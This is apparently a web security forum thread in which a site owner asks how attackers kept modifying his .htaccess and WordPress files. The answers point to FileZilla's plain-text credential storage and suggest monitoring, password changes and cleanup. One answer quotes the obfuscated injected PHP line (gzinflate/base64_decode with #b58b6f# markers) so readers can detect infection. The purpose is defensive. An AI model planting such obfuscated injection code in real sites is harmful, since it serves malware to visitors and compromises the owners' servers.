How to prevent my website from getting malware injection attacks?
My website was banned as a malware website by Google. When I checked the code, I found out that some code injected many files on my server. I cleaned everything manually, edited all files on my server (shared hosting) by searching some code from the injected code in all the files. Even the .htaccess file was modified by the attacker.
There were two WordPress installations on the website, in two different subfolders of the website root, which were not updated. I updated both.
Then Google removed ban on my website.
Yesterday, I found out that the .htaccess file on my website was again modified by the attacker. Here is the code:
I searched for "b58b6f" in all the files, but I don't find any. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.
How was the hacker able to hack my website? How to prevent this to happen again? How I can make my website more secure?
Do you have your website in subversion (or similar)? An hourly `svn status` cron job can alert you very quickly to *any* changes and a manual `svn revert` can remove all the changes.
I think this answer might apply to your situation. http://security.stackexchange.com/questions/16305/determining-the-point-of-compromise-on-an-infected-web-server/16322#16322
It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.
I'm suggesting that you to use FileZilla as the FTP client. If so, you must know that FileZilla store the credentials of your websites in plain text. A virus may have accessed your credentials, and then accessed all your registered websites searching for WordPress install in order to update the files by inserting this code.
Now, you should:
- Search your computer for any viruses, malware, etc.
- Change the FTP password of all your registered FTP accounts saved in FileZilla
- Eventually use a better FTP system, like WinSCP
A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?
And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your
header.phpfile in your theme folder. In fact, I suspect that you will find changed
header.phpin all of your themes folders.
And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.
And, you will find that the IP address in the FTP log of the hacker was from China.
Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed
For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like
index.php), if you find this code:
#b58b6f# echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”))); #/b58b6f#
For information, it translate into:
Which seems to lead to a 404 nowadays.